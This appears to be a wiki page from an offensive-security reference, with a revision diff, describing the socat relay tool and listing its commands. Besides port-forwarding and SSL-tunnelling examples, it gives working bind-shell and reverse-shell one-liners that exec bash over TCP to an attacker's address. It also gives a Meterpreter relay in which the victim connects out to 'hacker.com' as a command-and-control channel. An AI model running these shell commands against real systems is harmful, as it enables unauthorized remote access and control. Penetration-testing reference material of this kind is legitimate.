No edit summary |
No edit summary |
||
Line 1: | Line 1: | ||
[[Category:Tools]] | [[Category:Tools]] | ||
[[Category:Command and Control]] | |||
==Description== | ==Description== | ||
socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals. | socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals. |
Revision as of 13:05, 30 January 2023
Description
socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
socat can be used, e.g., as TCP port forwarder (one-shot or daemon), as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets, IP6 relay, for redirecting TCP oriented programs to a serial line, to logically connect serial lines on different computers, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections.
Commands
# Listen on port 8080 forward all traffic to 80
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
# Tunnel connection from Local TCP Port to remote service
socat -v tcp4-listen:8000,reuseaddr,fork tcp4:6.6.6.6:80
# Tunnel plain text connection to SSL Endpoint
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0
# Add requirement that server-side certificates must exist for socat to host SSL/TSL connections
socat -v tcp4-listen:9000,reuseaddr,fork ssl:6.6.6.6:443,verify=0,cert=./provisional_prov.pem
# SLL/TSL Connection on localhost 7000 to remote host on port 6000
socat -v openssl-listen:7000,cert=cert.pem,verify=0,reuseaddr,fork tcp4:6.6.6.6:6000
Bind Shell
# Attacker
socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
# Victim
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
Reverse Shell
# Attacker
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
# Victim
socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
Port to Port through SOCKS Proxy
socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
Meterpreter Through SSL[1]
# Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
# Attacker
socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:127.0.0.1:3333
# Victim
socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5